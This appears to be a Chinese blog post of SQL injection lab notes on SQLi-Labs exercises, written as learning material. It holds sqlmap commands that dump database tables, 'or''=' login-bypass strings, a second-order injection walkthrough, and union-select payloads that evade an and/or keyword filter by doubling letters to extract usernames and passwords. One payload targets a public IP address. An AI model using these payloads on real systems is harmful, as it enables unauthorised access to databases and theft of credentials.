【无标题】

sql实验1

今年的春节,不同往年
今年的春节,不同往年。

少了几分热闹,多了几分闲适。
在这里插入图片描述

sqlmap -u http://ip/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6 --tables --purge

在这里插入图片描述
在这里插入图片描述

获取指定数据库指定表中的字段:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns

sqlmap -u http://ip/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6 -D 2web -T IS_KEY --columns

在这里插入图片描述

获取指定数据库指定表的指定字段的字段内容:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump

sqlmap -u http://ip/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6 -D 2web -T IS_KEY -C haha --dump

在这里插入图片描述

sql实验2

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

'or''='
'Or''='
'OR''='

在这里插入图片描述

在这里插入图片描述

二阶注入实验三

二阶SQL注入跟等价的一阶SQL注入一样功能强大。不过它是一种更细微的漏洞,通常更难被检测到。

在这里插入图片描述

New User click here?
注册后登录来到下方页面
在这里插入图片描述
修改当前密码
在这里插入图片描述

Password successfully updated

重新访问SQLi-Labs网站Less-24,访问的URL为

http://127.0.0.1/Less-24/
利用admin 账户和修改的密码登录

加粗样式

实验四过滤and和or

在这里插入图片描述

/?id=1' --+

在这里插入图片描述

' order by 3--+

Hint: Your Input is Filtered with following result: 1' der by 3-- 

复写

' oorrder by 4 --+
http://ip/Less-25/?id=1%27%20oorrder%20by%204%20--+

不可取
在这里插入图片描述

当字段为3时可以
在这里插入图片描述

?id=1' union select 1,2,3--+

在这里插入图片描述

爆库

http://ip/Less-25/?id=?id=1%27%20union%20select%201,group_concat(schema_name),3%20from%20infoorrmation_schema.schemata%20--+

在这里插入图片描述

http://ip/Less-25/?id=?id=1%27%20union%20select%201,user(),database()--+

在这里插入图片描述

2.爆表

?id=?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),3-- #

在这里插入图片描述

3.爆字段

http://IP/Less-25/?id=?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'),3-- #

在这里插入图片描述

4.爆数据

?id=-1’ union select 1,group_concat(username,0x5c,passwoorrd),3 from users --+

http://39.104.82.167/Less-25/?id=?id=-1' union select 1,(select group_concat(concat_ws('-',id,username,passwoorrd)) from users),3-- #

在这里插入图片描述

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值